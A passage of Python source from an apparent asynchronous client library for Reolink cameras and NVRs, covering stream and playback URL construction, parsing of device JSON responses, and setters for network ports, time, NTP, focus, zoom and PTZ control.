f\"{http_s}://{self._host}:{self._port}/flv?port={self._rtmp_port}&app=bcs&stream=channel{channel}_{stream}.bcs&user={self._username}&password={password}\"\n\n def get_rtmp_stream_source(self, channel: int, stream: Optional[str] = None) -> Optional[str]:\n if channel not in self._stream_channels:\n return None\n\n if stream is None:\n stream = self._stream\n\n stream_type = None\n if stream in [\"sub\", \"autotrack_sub\"]:\n stream_type = 1\n else:\n stream_type = 0\n if self._rtmp_auth_method == DEFAULT_RTMP_AUTH_METHOD:\n password = parse.quote(self._password)\n return f\"rtmp://{self._host}:{self._rtmp_port}/bcs/channel{channel}_{stream}.bcs?channel={channel}&stream={stream_type}&user={self._username}&password={password}\"\n\n return f\"rtmp://{self._host}:{self._rtmp_port}/bcs/channel{channel}_{stream}.bcs?channel={channel}&stream={stream_type}&token={self._token}\"\n\n async def get_rtsp_stream_source(self, channel: int, stream: Optional[str] = None) -> Optional[str]:\n if channel not in self._stream_channels:\n return None\n\n if stream is None:\n stream = self._stream\n\n if self._is_nvr and stream == \"main\" and channel in self._rtsp_mainStream:\n return self._rtsp_mainStream[channel]\n if self._is_nvr and stream == \"sub\" and channel in self._rtsp_subStream:\n return self._rtsp_subStream[channel]\n\n if not self._enc_settings:\n try:\n await self.get_state(cmd=\"GetEnc\")\n except ReolinkError:\n pass\n\n encoding = self._enc_settings.get(channel, {}).get(\"Enc\", {}).get(f\"{stream}Stream\", {}).get(\"vType\")\n if encoding is None and stream == \"main\" and channel in self._rtsp_mainStream:\n return self._rtsp_mainStream[channel]\n\n if encoding is None and stream == \"sub\" and channel in self._rtsp_subStream:\n return self._rtsp_subStream[channel]\n\n if encoding is None and stream == \"main\":\n if self.api_version(\"mainEncType\", channel) > 0:\n encoding = \"h265\"\n else:\n encoding = \"h264\"\n\n if encoding is None:\n _LOGGER.debug(\n \"Host %s:%s rtsp stream: GetEnc incomplete, GetRtspUrl unavailable, falling back to h264 encoding for channel %i, Enc: %s\",\n self._host,\n self._port,\n channel,\n self._enc_settings,\n )\n encoding = \"h264\"\n\n password = parse.quote(self._password)\n channel_str = f\"{channel + 1:02d}\"\n\n return f\"rtsp://{self._username}:{password}@{self._host}:{self._rtsp_port}/{encoding}Preview_{channel_str}_{stream}\"\n\n async def get_stream_source(self, channel: int, stream: Optional[str] = None) -> Optional[str]:\n \"\"\"Return the stream source url.\"\"\"\n try:\n await self.login()\n except LoginError:\n return None\n\n if stream is None:\n stream = self._stream\n\n if stream not in [\"main\", \"sub\", \"ext\", \"autotrack_sub\"]:\n return None\n if self.protocol == \"rtmp\":\n return self.get_rtmp_stream_source(channel, stream)\n if self.protocol == \"flv\" or stream == \"autotrack_sub\":\n return self.get_flv_stream_source(channel, stream)\n if self.protocol == \"rtsp\":\n return await self.get_rtsp_stream_source(channel, stream)\n return None\n\n async def get_vod_source(\n self,\n channel: int,\n filename: str,\n stream: Optional[str] = None,\n ) -> tuple[str, str]:\n \"\"\"Return the VOD source url.\"\"\"\n if channel not in self._channels:\n raise InvalidParameterError(f\"get_vod_source: no camera connected to channel '{channel}'\")\n\n # Since no request is made, make sure we are logged in.\n await self.login()\n\n if self._use_https:\n http_s = \"https\"\n else:\n http_s = \"http\"\n\n if self._is_nvr:\n # NVR VoDs \"type=0\": Adobe flv\n # NVR VoDs \"type=1\": mp4\n return (\n \"application/x-mpegURL\",\n f\"{http_s}://{self._host}:{self._port}/flv?port=1935&app=bcs&stream=playback.bcs&channel={channel}\"\n f\"&type=1&start={filename}&seek=0&user={self._username}&password={self._password}\",\n )\n\n # Alternative\n # return (\n # \"application/x-mpegURL\",\n # f\"{self._url}?&cmd=Playback&channel={channel}&source={filename}&user={self._username}&password={self._password}\",\n # )\n\n if stream is None:\n stream = self._stream\n\n stream_type: int\n if stream == \"sub\":\n stream_type = 1\n else:\n stream_type = 0\n # If the camera provides a / in the filename it needs to be encoded with %20\n # Camera VoDs are only available over rtmp, rtsp is not an option\n file = filename.replace(\"/\", \"%20\")\n # Looks like it only works with login/password method, not with token\n return (\n \"application/x-mpegURL\",\n f\"rtmp://{self._host}:{self._rtmp_port}/vod/{file}?channel={channel}&stream={stream_type}&user={self._username}&password={self._password}\",\n )\n\n async def download_vod(self, filename: str, wanted_filename: Optional[str] = None) -> typings.VOD_download:\n if wanted_filename is None:\n wanted_filename = filename.replace(\"/\", \"_\")\n\n param: dict[str, Any] = {\"cmd\": \"Download\", \"source\": filename, \"output\": wanted_filename}\n body: typings.reolink_json = [{}]\n response = await self.send(body, param, expected_response_type=\"application/octet-stream\")\n\n if response.content_length is None:\n response.release()\n raise UnexpectedDataError(f\"Host {self._host}:{self._port}: Download VOD: no 'content_length' in the response\")\n if response.content_disposition is None or response.content_disposition.filename is None:\n response.release()\n raise UnexpectedDataError(f\"Host {self._host}:{self._port}: Download VOD: no 'content_disposition.filename' in the response\")\n\n return typings.VOD_download(response.content_length, response.content_disposition.filename, response.content, response.release, response.headers.get(\"ETag\"))\n\n def map_host_json_response(self, json_data: typings.reolink_json):\n \"\"\"Map the JSON objects to internal cache-objects.\"\"\"\n for data in json_data:\n try:\n if data[\"code\"] == 1: # Error, like \"ability error\"\n continue\n\n if data[\"cmd\"] == \"GetChannelstatus\":\n if not self._GetChannelStatus_present and (self._nvr_num_channels == 0 or len(self._channels) == 0):\n self._channels.clear()\n self._is_doorbell.clear()\n\n cur_value = data[\"value\"]\n self._nvr_num_channels = cur_value[\"count\"]\n\n if self._nvr_num_channels > 0:\n cur_status = cur_value[\"status\"]\n\n # Not all Reolink devices respond with \"name\" attribute.\n if \"name\" in cur_status[0]:\n self._GetChannelStatus_has_name = True\n self._channel_names.clear()\n else:\n self._GetChannelStatus_has_name = False\n\n for ch_info in cur_status:\n if ch_info[\"online\"] == 1:\n cur_channel = ch_info[\"channel\"]\n\n if self._GetChannelStatus_has_name:\n self._channel_names[cur_channel] = ch_info[\"name\"]\n\n if \"typeInfo\" in ch_info: # Not all Reolink devices respond with \"typeInfo\" attribute.\n self._channel_models[cur_channel] = ch_info[\"typeInfo\"]\n self._is_doorbell[cur_channel] = \"Doorbell\" in self._channel_models[cur_channel]\n\n self._channels.append(cur_channel)\n else:\n self._channel_names.clear()\n elif self._GetChannelStatus_has_name:\n cur_status = data[\"value\"][\"status\"]\n for ch_info in cur_status:\n if ch_info[\"online\"] == 1:\n self._channel_names[ch_info[\"channel\"]] = ch_info[\"name\"]\n\n if not self._GetChannelStatus_present:\n self._GetChannelStatus_present = True\n\n break\n\n except Exception as err: # pylint: disable=bare-except\n _LOGGER.error(\n \"Host %s:%s failed mapping JSON data: %s, traceback:\\n%s\\n\",\n self._host,\n self._port,\n str(err),\n traceback.format_exc(),\n )\n continue\n\n for data in json_data:\n try:\n if data[\"code\"] == 1: # Error, like \"ability error\"\n continue\n\n if data[\"cmd\"] == \"GetDevInfo\":\n dev_info = data[\"value\"][\"DevInfo\"]\n self._is_nvr = dev_info.get(\"exactType\", \"CAM\") == \"NVR\"\n self._nvr_serial = dev_info[\"serial\"]\n self._nvr_name = dev_info[\"name\"]\n self._nvr_model = dev_info[\"model\"]\n self._nvr_hw_version = dev_info[\"hardVer\"]\n self._nvr_sw_version = dev_info[\"firmVer\"]\n if self._nvr_sw_version is not None:\n self._nvr_sw_version_object = SoftwareVersion(self._nvr_sw_version)\n\n # In case the \"GetChannelStatus\" command not supported by the device.\n if not self._GetChannelStatus_present and self._nvr_num_channels == 0:\n self._channels.clear()\n\n self._nvr_num_channels = dev_info[\"channelNum\"]\n\n if self._is_nvr:\n _LOGGER.warning(\n \"Your %s NVR doesn't support the 'Getchannelstatus' command. \"\n \"Probably you need to update your firmware.\\n\"\n \"No way to recognize active channels, all %s channels will be considered 'active' as a result\",\n self._nvr_name,\n self._nvr_num_channels,\n )\n\n if self._nvr_num_channels > 0:\n for ch in range(self._nvr_num_channels):\n self._channels.append(ch)\n if ch not in self._channel_models and self._nvr_model is not None:\n self._channel_models[ch] = self._nvr_model\n self._is_doorbell[ch] = \"Doorbell\" in self._nvr_model\n\n elif data[\"cmd\"] == \"GetHddInfo\":\n self._hdd_info = data[\"value\"][\"HddInfo\"]\n\n elif data[\"cmd\"] == \"GetLocalLink\":\n self._local_link = data[\"value\"]\n self._mac_address = data[\"value\"][\"LocalLink\"][\"mac\"]\n\n elif data[\"cmd\"] == \"GetWifiSignal\":\n self._wifi_signal = data[\"value\"][\"wifiSignal\"]\n\n elif data[\"cmd\"] == \"GetNetPort\":\n self._netport_settings = data[\"value\"]\n net_port = data[\"value\"][\"NetPort\"]\n self._rtsp_port = net_port.get(\"rtspPort\", 554)\n self._rtmp_port = net_port.get(\"rtmpPort\", 1935)\n self._onvif_port = net_port.get(\"onvifPort\", 8000)\n self._rtsp_enabled = net_port.get(\"rtspEnable\", 1) == 1\n self._rtmp_enabled = net_port.get(\"rtmpEnable\", 1) == 1\n self._onvif_enabled = net_port.get(\"onvifEnable\", 1) == 1\n self._subscribe_url = f\"http://{self._host}:{self._onvif_port}/onvif/event_service\"\n\n elif data[\"cmd\"] == \"GetUser\":\n self._users = data[\"value\"][\"User\"]\n\n elif data[\"cmd\"] == \"GetNtp\":\n self._ntp_settings = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetTime\":\n time_diffrence = (datetime.now() - reolink_time_to_datetime(data[\"value\"][\"Time\"])).total_seconds()\n if abs(time_diffrence) < 10:\n time_diffrence = 0\n self._host_time_difference = time_diffrence\n self._time_settings = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetAbility\":\n self._abilities = data[\"value\"][\"Ability\"]\n\n except Exception as err: # pylint: disable=bare-except\n _LOGGER.error(\n \"Host %s:%s failed mapping JSON data: %s, traceback:\\n%s\\n\",\n self._host,\n self._port,\n str(err),\n traceback.format_exc(),\n )\n continue\n\n def map_channels_json_response(self, json_data, channels: list[int]):\n if len(json_data) != len(channels):\n _LOGGER.error(\n \"Host %s:%s error mapping response to channels, received %i responses while requesting %i responses\",\n self._host,\n self._port,\n len(json_data),\n len(channels),\n )\n return\n\n for data, channel in zip(json_data, channels):\n if channel == -1:\n self.map_host_json_response([data])\n continue\n\n self.map_channel_json_response([data], channel)\n\n def map_channel_json_response(self, json_data, channel: int):\n \"\"\"Map the JSON objects to internal cache-objects.\"\"\"\n response_channel = channel\n for data in json_data:\n try:\n if data[\"code\"] == 1: # -->Error, like \"ability error\"\n _LOGGER.debug(\"Host %s:%s received response error code: %s\", self._host, self._port, data)\n continue\n\n if data[\"cmd\"] == \"GetChnTypeInfo\":\n self._channel_models[channel] = data[\"value\"][\"typeInfo\"]\n self._is_doorbell[channel] = \"Doorbell\" in self._channel_models[channel]\n\n if data[\"cmd\"] == \"GetEvents\":\n response_channel = data[\"value\"][\"channel\"]\n if response_channel != channel:\n _LOGGER.error(\"Host %s:%s: GetEvents response channel %s does not equal requested channel %s\", self._host, self._port, response_channel, channel)\n continue\n if \"ai\" in data[\"value\"]:\n self._ai_detection_states[channel] = {}\n self._ai_detection_support[channel] = {}\n for key, value in data[\"value\"][\"ai\"].items():\n supported: bool = value.get(\"support\", 0) == 1\n self._ai_detection_states[channel][key] = supported and value.get(\"alarm_state\", 0) == 1\n self._ai_detection_support[channel][key] = supported\n if \"md\" in data[\"value\"]:\n self._motion_detection_states[channel] = data[\"value\"][\"md\"][\"alarm_state\"] == 1\n if \"visitor\" in data[\"value\"]:\n value = data[\"value\"][\"visitor\"]\n supported = value.get(\"support\", 0) == 1\n self._visitor_states[channel] = supported and value.get(\"alarm_state\", 0) == 1\n self._is_doorbell[channel] = supported\n\n elif data[\"cmd\"] == \"GetMdState\":\n self._motion_detection_states[channel] = data[\"value\"][\"state\"] == 1\n\n elif data[\"cmd\"] == \"GetAlarm\":\n self._md_alarm_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetMdAlarm\":\n self._md_alarm_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetAiAlarm\":\n ai_type = data[\"value\"][\"AiAlarm\"][\"ai_type\"]\n if channel not in self._ai_alarm_settings:\n self._ai_alarm_settings[channel] = {}\n self._ai_alarm_settings[channel][ai_type] = data[\"value\"][\"AiAlarm\"]\n\n elif data[\"cmd\"] == \"GetAiState\":\n self._ai_detection_states[channel] = {}\n self._ai_detection_support[channel] = {}\n response_channel = data[\"value\"].get(\"channel\", channel)\n if response_channel != channel:\n _LOGGER.error(\"Host %s:%s: GetAiState response channel %s does not equal requested channel %s\", self._host, self._port, response_channel, channel)\n continue\n\n for key, value in data[\"value\"].items():\n if key == \"channel\":\n continue\n\n if isinstance(value, int): # compatibility with firmware < 3.0.0-494\n self._ai_detection_states[channel][key] = value == 1\n self._ai_detection_support[channel][key] = True\n else:\n # from firmware 3.0.0.0-494 there is a new json structure:\n # [\n # {\n # \"cmd\" : \"GetAiState\",\n # \"code\" : 0,\n # \"value\" : {\n # \"channel\" : 0,\n # \"face\" : {\n # \"alarm_state\" : 0,\n # \"support\" : 0\n # },\n # \"people\" : {\n # \"alarm_state\" : 0,\n # \"support\" : 1\n # },\n # \"vehicle\" : {\n # \"alarm_state\" : 0,\n # \"support\" : 1\n # }\n # }\n # }\n # ]\n supported = value.get(\"support\", 0) == 1\n self._ai_detection_states[channel][key] = supported and value.get(\"alarm_state\", 0) == 1\n self._ai_detection_support[channel][key] = supported\n\n elif data[\"cmd\"] == \"GetOsd\":\n response_channel = data[\"value\"][\"Osd\"][\"channel\"]\n self._osd_settings[channel] = data[\"value\"]\n if not self._GetChannelStatus_present or not self._GetChannelStatus_has_name:\n self._channel_names[channel] = data[\"value\"][\"Osd\"][\"osdChannel\"][\"name\"]\n\n elif data[\"cmd\"] == \"GetFtp\":\n self._ftp_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetFtpV20\":\n self._ftp_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetPush\":\n self._push_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetPushV20\":\n self._push_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetEnc\":\n # GetEnc returns incorrect channel for DUO camera\n # response_channel = data[\"value\"][\"Enc\"][\"channel\"]\n self._enc_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetRtspUrl\":\n response_channel = data[\"value\"][\"rtspUrl\"][\"channel\"]\n password = parse.quote(self._password)\n mainStream = data[\"value\"][\"rtspUrl\"][\"mainStream\"]\n subStream = data[\"value\"][\"rtspUrl\"][\"subStream\"]\n self._rtsp_mainStream[channel] = mainStream.replace(\"rtsp://\", f\"rtsp://{self._username}:{password}@\")\n self._rtsp_subStream[channel] = subStream.replace(\"rtsp://\", f\"rtsp://{self._username}:{password}@\")\n\n elif data[\"cmd\"] == \"GetEmail\":\n self._email_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetEmailV20\":\n self._email_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetBuzzerAlarmV20\":\n self._buzzer_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetIsp\":\n response_channel = data[\"value\"][\"Isp\"][\"channel\"]\n self._isp_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetIrLights\":\n self._ir_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetPowerLed\":\n # GetPowerLed returns incorrect channel\n # response_channel = data[\"value\"][\"PowerLed\"][\"channel\"]\n self._status_led_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetWhiteLed\":\n response_channel = data[\"value\"][\"WhiteLed\"][\"channel\"]\n self._whiteled_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetRec\":\n self._recording_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetRecV20\":\n self._recording_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetPtzPreset\":\n self._ptz_presets_settings[channel] = data[\"value\"]\n self._ptz_presets[channel] = {}\n for preset in data[\"value\"][\"PtzPreset\"]:\n if int(preset[\"enable\"]) == 1:\n preset_name = preset[\"name\"]\n preset_id = int(preset[\"id\"])\n self._ptz_presets[channel][preset_name] = preset_id\n\n elif data[\"cmd\"] == \"GetPtzGuard\":\n self._ptz_guard_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetPtzCurPos\":\n self._ptz_position[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetAiCfg\":\n self._auto_track_settings[channel] = data[\"value\"]\n if \"range\" in data:\n self._auto_track_range[channel] = data[\"range\"]\n\n elif data[\"cmd\"] == \"GetPtzTraceSection\":\n self._auto_track_limits[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetAudioCfg\":\n self._audio_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetAudioAlarm\":\n self._audio_alarm_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetAudioAlarmV20\":\n self._audio_alarm_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetAudioFileList\":\n self._audio_file_list[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetAutoReply\":\n self._auto_reply_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetAutoFocus\":\n self._auto_focus_settings[channel] = data[\"value\"]\n\n elif data[\"cmd\"] == \"GetZoomFocus\":\n self._zoom_focus_settings[channel] = data[\"value\"]\n if \"range\" in data:\n self._zoom_focus_range[channel] = data[\"range\"][\"ZoomFocus\"]\n\n except Exception as err:\n _LOGGER.error(\n \"Host %s:%s (channel %s) failed mapping JSON data: %s, traceback:\\n%s\\n\",\n self._host,\n self._port,\n channel,\n str(err),\n traceback.format_exc(),\n )\n continue\n if response_channel != channel:\n _LOGGER.error(\"Host %s:%s: command %s response channel %s does not equal requested channel %s\", self._host, self._port, data[\"cmd\"], response_channel, channel)\n\n async def set_net_port(\n self,\n enable_onvif: bool | None = None,\n enable_rtmp: bool | None = None,\n enable_rtsp: bool | None = None,\n ) -> None:\n \"\"\"Set Network Port parameters on the host (NVR or camera).\"\"\"\n if self._netport_settings is None:\n await self.get_state(\"GetNetPort\")\n\n if self._netport_settings is None:\n raise NotSupportedError(f\"set_net_port: failed to retrieve current NetPort settings from {self._host}:{self._port}\")\n\n body: typings.reolink_json = [{\"cmd\": \"SetNetPort\", \"param\": self._netport_settings}]\n\n if enable_onvif is not None:\n body[0][\"param\"][\"NetPort\"][\"onvifEnable\"] = 1 if enable_onvif else 0\n if enable_rtmp is not None:\n body[0][\"param\"][\"NetPort\"][\"rtmpEnable\"] = 1 if enable_rtmp else 0\n if enable_rtsp is not None:\n body[0][\"param\"][\"NetPort\"][\"rtspEnable\"] = 1 if enable_rtsp else 0\n\n await self.send_setting(body)\n await self.expire_session() # When changing network port settings, tokens are invalidated.\n\n async def set_time(self, dateFmt=None, hours24=None, tzOffset=None) -> None:\n \"\"\"Set time on the host (NVR or camera).\n Arguments:\n dateFmt (string) Format of the date in the OSD timestamp\n hours24 (boolean) True selects 24h format, False selects 12h format\n tzoffset (int) Timezone offset versus UTC in seconds\n\n Always get current time first\"\"\"\n await self.get_state(\"GetTime\")\n if self._time_settings is None:\n raise NotSupportedError(f\"set_time: failed to retrieve current time settings from {self._host}:{self._port}\")\n\n body: typings.reolink_json = [{\"cmd\": \"SetTime\", \"action\": 0, \"param\": self._time_settings}]\n\n if dateFmt is not None:\n if dateFmt in [\"DD/MM/YYYY\", \"MM/DD/YYYY\", \"YYYY/MM/DD\"]:\n body[0][\"param\"][\"Time\"][\"timeFmt\"] = dateFmt\n else:\n raise InvalidParameterError(f\"set_time: date format {dateFmt} not in ['DD/MM/YYYY', 'MM/DD/YYYY', 'YYYY/MM/DD']\")\n\n if hours24 is not None:\n if hours24:\n body[0][\"param\"][\"Time\"][\"hourFmt\"] = 0\n else:\n body[0][\"param\"][\"Time\"][\"hourFmt\"] = 1\n\n if tzOffset is not None:\n if not isinstance(tzOffset, int):\n raise InvalidParameterError(f\"set_time: time zone offset {tzOffset} is not integer\")\n if tzOffset < -43200 or tzOffset > 50400:\n raise InvalidParameterError(f\"set_time: time zone offset {tzOffset} not in range -43200..50400\")\n body[0][\"param\"][\"Time\"][\"timeZone\"] = tzOffset\n\n await self.send_setting(body)\n\n async def set_ntp(self, enable: bool | None = None, server: str | None = None, port: int | None = None, interval: int | None = None) -> None:\n \"\"\"\n Set NTP parameters on the host (NVR or camera).\n Arguments:\n enable (boolean) Enable synchronization\n server (string) Name or IP-Address of time server (or pool)\n port (int) Port number in range of (1..65535)\n interval (int) Interval of synchronization in minutes in range of (60-65535)\n \"\"\"\n if self._ntp_settings is None:\n await self.get_state(\"GetNtp\")\n\n if self._ntp_settings is None:\n raise NotSupportedError(f\"set_ntp: failed to retrieve current NTP settings from {self._host}:{self._port}\")\n\n body: typings.reolink_json = [{\"cmd\": \"SetNtp\", \"action\": 0, \"param\": self._ntp_settings}]\n\n if enable is not None:\n if enable:\n body[0][\"param\"][\"Ntp\"][\"enable\"] = 1\n else:\n body[0][\"param\"][\"Ntp\"][\"enable\"] = 0\n\n if server is not None:\n body[0][\"param\"][\"Ntp\"][\"server\"] = server\n\n if port is not None:\n if not isinstance(port, int):\n raise InvalidParameterError(f\"set_ntp: Invalid NTP port {port} specified, type is not integer\")\n if port < 1 or port > 65535:\n raise InvalidParameterError(f\"set_ntp: Invalid NTP port {port} specified, out of valid range 1...65535\")\n body[0][\"param\"][\"Ntp\"][\"port\"] = port\n\n if interval is not None:\n if not isinstance(interval, int):\n raise InvalidParameterError(f\"set_ntp: Invalid NTP interval {interval} specified, type is not integer\")\n if interval < 60 or interval > 65535:\n raise InvalidParameterError(f\"set_ntp: Invalid NTP interval {interval} specified, out of valid range 60...65535\")\n body[0][\"param\"][\"Ntp\"][\"interval\"] = interval\n\n await self.send_setting(body)\n\n async def sync_ntp(self) -> None:\n \"\"\"Sync date and time on the host via NTP now.\"\"\"\n if self._ntp_settings is None:\n await self.get_state(\"GetNtp\")\n\n if self._ntp_settings is None:\n raise NotSupportedError(f\"set_ntp: failed to retrieve current NTP settings from {self._host}:{self._port}\")\n\n body: typings.reolink_json = [{\"cmd\": \"SetNtp\", \"action\": 0, \"param\": self._ntp_settings}]\n body[0][\"param\"][\"Ntp\"][\"interval\"] = 0\n\n await self.send_setting(body)\n\n def get_focus(self, channel: int) -> None:\n \"\"\"Get absolute focus value.\"\"\"\n if channel not in self._channels:\n raise InvalidParameterError(f\"get_focus: no camera connected to channel '{channel}'\")\n if channel not in self._zoom_focus_settings or not self._zoom_focus_settings[channel]:\n raise NotSupportedError(f\"get_focus: ZoomFocus on camera {self.camera_name(channel)} is not available\")\n\n return self._zoom_focus_settings[channel][\"ZoomFocus\"][\"focus\"][\"pos\"]\n\n async def set_focus(self, channel: int, focus: int) -> None:\n \"\"\"Set absolute focus value.\n Parameters:\n focus (int) 0..223\"\"\"\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_focus: no camera connected to channel '{channel}'\")\n if not self.supported(channel, \"focus\"):\n raise NotSupportedError(f\"set_focus: not supported by camera {self.camera_name(channel)}\")\n min_focus = self.zoom_range(channel)[\"focus\"][\"pos\"][\"min\"]\n max_focus = self.zoom_range(channel)[\"focus\"][\"pos\"][\"max\"]\n if not isinstance(focus, int):\n raise InvalidParameterError(f\"set_focus: focus value {focus} not integer\")\n if focus not in range(min_focus, max_focus + 1):\n raise InvalidParameterError(f\"set_focus: focus value {focus} not in range {min_focus}..{max_focus}\")\n\n body = [\n {\n \"cmd\": \"StartZoomFocus\",\n \"action\": 0,\n \"param\": {\"ZoomFocus\": {\"channel\": channel, \"op\": \"FocusPos\", \"pos\": focus}},\n }\n ]\n\n await self.send_setting(body)\n await asyncio.sleep(3)\n await self.get_state(cmd=\"GetZoomFocus\")\n\n def autofocus_enabled(self, channel: int) -> bool:\n \"\"\"Auto focus enabled.\"\"\"\n if channel not in self._auto_focus_settings:\n return True\n\n return self._auto_focus_settings[channel][\"AutoFocus\"][\"disable\"] == 0\n\n async def set_autofocus(self, channel: int, enable: bool) -> None:\n \"\"\"Enable/Disable AutoFocus on a camera.\"\"\"\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_autofocus: no camera connected to channel '{channel}'\")\n if channel not in self._auto_focus_settings:\n raise NotSupportedError(f\"set_autofocus: AutoFocus on camera {self.camera_name(channel)} is not available\")\n\n body: typings.reolink_json = [{\"cmd\": \"SetAutoFocus\", \"action\": 0, \"param\": {\"AutoFocus\": {\"disable\": 0 if enable else 1, \"channel\": channel}}}]\n await self.send_setting(body)\n\n def get_zoom(self, channel: int):\n \"\"\"Get absolute zoom value.\"\"\"\n if channel not in self._channels:\n raise InvalidParameterError(f\"get_zoom: no camera connected to channel '{channel}'\")\n if channel not in self._zoom_focus_settings or not self._zoom_focus_settings[channel]:\n raise NotSupportedError(f\"get_zoom: ZoomFocus on camera {self.camera_name(channel)} is not available\")\n\n return self._zoom_focus_settings[channel][\"ZoomFocus\"][\"zoom\"][\"pos\"]\n\n async def set_zoom(self, channel: int, zoom: int) -> None:\n \"\"\"Set absolute zoom value.\n Parameters:\n zoom (int) 0..33\"\"\"\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_zoom: no camera connected to channel '{channel}'\")\n if not self.supported(channel, \"zoom\"):\n raise NotSupportedError(f\"set_zoom: not supported by camera {self.camera_name(channel)}\")\n min_zoom = self.zoom_range(channel)[\"zoom\"][\"pos\"][\"min\"]\n max_zoom = self.zoom_range(channel)[\"zoom\"][\"pos\"][\"max\"]\n if not isinstance(zoom, int):\n raise InvalidParameterError(f\"set_zoom: zoom value {zoom} not integer\")\n if zoom not in range(min_zoom, max_zoom + 1):\n raise InvalidParameterError(f\"set_zoom: zoom value {zoom} not in range {min_zoom}..{max_zoom}\")\n\n body = [\n {\n \"cmd\": \"StartZoomFocus\",\n \"action\": 0,\n \"param\": {\"ZoomFocus\": {\"channel\": channel, \"op\": \"ZoomPos\", \"pos\": zoom}},\n }\n ]\n\n await self.send_setting(body)\n await asyncio.sleep(3)\n await self.get_state(cmd=\"GetZoomFocus\")\n\n def ptz_presets(self, channel: int) -> dict:\n if channel not in self._ptz_presets:\n return {}\n\n return self._ptz_presets[channel]\n\n async def set_ptz_command(self, channel: int, command: str | None = None, preset: int | str | None = None, speed: int | None = None) -> None:\n \"\"\"Send PTZ command to the camera, list of possible commands see PtzEnum.\"\"\"\n\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_ptz_command: no camera connected to channel '{channel}'\")\n if speed is not None and not isinstance(speed, int):\n raise InvalidParameterError(f\"set_ptz_command: speed {speed} is not integer\")\n if speed is not None and not self.supported(channel, \"ptz_speed\"):\n raise NotSupportedError(f\"set_ptz_command: ptz speed on camera {self.camera_name(channel)} is not available\")\n command_list = [com.value for com in PtzEnum]\n if command is not None and command not in command_list:\n raise InvalidParameterError(f\"set_ptz_command: command {command} not in {command_list}\")\n\n if preset is not None:\n command = \"ToPos\"\n if isinstance(preset, str):\n if preset not in self.ptz_presets(channel):\n raise InvalidParameterError(f\"set_ptz_command: preset '{preset}' not in available presets {list(self.ptz_presets(channel).keys())}\")\n preset = self.ptz_presets(channel)[preset]\n if not isinstance(preset, int):\n raise InvalidParameterError(f\"set_ptz_command: preset {preset} is not integer\")\n\n if command is None:\n raise InvalidParameterError(\"set_ptz_command: No command or preset specified.\")\n\n body: typings.reolink_json = [\n {\n \"cmd\": \"PtzCtrl\",\n \"action\": 0,\n \"param\": {\"channel\": channel, \"op\": command},\n }\n ]\n\n if speed:\n body[0][\"param\"][\"speed\"] = speed\n if preset:\n body[0][\"param\"][\"id\"] = preset\n\n await self.send_setting(body)\n\n def ptz_pan_position(self, channel: int) -> int:\n \"\"\"pan position\"\"\"\n if channel not in self._ptz_position:\n return 0\n\n return self._ptz_position[channel][\"PtzCurPos\"][\"Ppos\"]\n\n def ptz_guard_enabled(self, channel: int) -> bool:\n if channel not in self._ptz_guard_settings:\n return False\n\n values = self._ptz_guard_settings[channel][\"PtzGuard\"]\n return values[\"benable\"] == 1 and values[\"bexistPos\"] == 1\n\n def ptz_guard_time(self, channel: int) -> int:\n \"\"\"Guard point return time in seconds\"\"\"\n if channel not in self._ptz_guard_settings:\n return 60\n\n return self._ptz_guard_settings[channel][\"PtzGuard\"][\"timeout\"]\n\n async def set_ptz_guard(self, channel: int, command: str | None = None, enable: bool | None = None, time: int | None = None) -> None:\n \"\"\"Send PTZ guard.\"\"\"\n\n if channel not in self._channels:\n raise InvalidParameterError(f\"set_ptz_guard: no camera connected to channel '{channel}'\")\n if time is not None and not isinstance(time, int):\n raise InvalidParameterError(f\"set_ptz_guard: guard time {time} is not integer\")\n command_list = [com.value for com in GuardEnum]\n if command is not None and command not in command_list:\n raise InvalidParameterError(f\"set_ptz_guard: command {command} not in {command_list}\")\n\n params: dict[str, Any] = {\"channel\": channel}\n if command is not None:\n params[\"cmdStr\"] = command\n if command == \"setPos\":\n params[\"bSaveCurrentPos\"] = 1\n if command is None:\n params[\"cmdStr\"] = \"setPos\"\n if enable is not None:\n params[\"benable\"] = 1 if enable else 0\n if time is not None:\n params[\"timeout\"] = time\n\n body: typings.reolink_json = [{\"cmd\": \"SetPtzGuard\", \"action\": 0, \"param\": {\"PtzGuard\": params}}]\n await self.send_setting(body)\n\n async def ptz_callibrate(self, channel: int) -> None:\n \"\"\"Callibrate PTZ of the camera.\"\"\"\n if channel not in self._channels:\n raise InvalidParameterError(f\"ptz_callibrate: no camera connected to channel '{channel}'\")\n\n body: typings.reolink_json = [{\"cmd\": \"PtzCheck\", \"action\": 0, \"param\": {\"channel\": channel}}]\n await self.send_setting(body)\n\n def auto_track_enabled(self, channel: int) -> bool:\n if channel not in 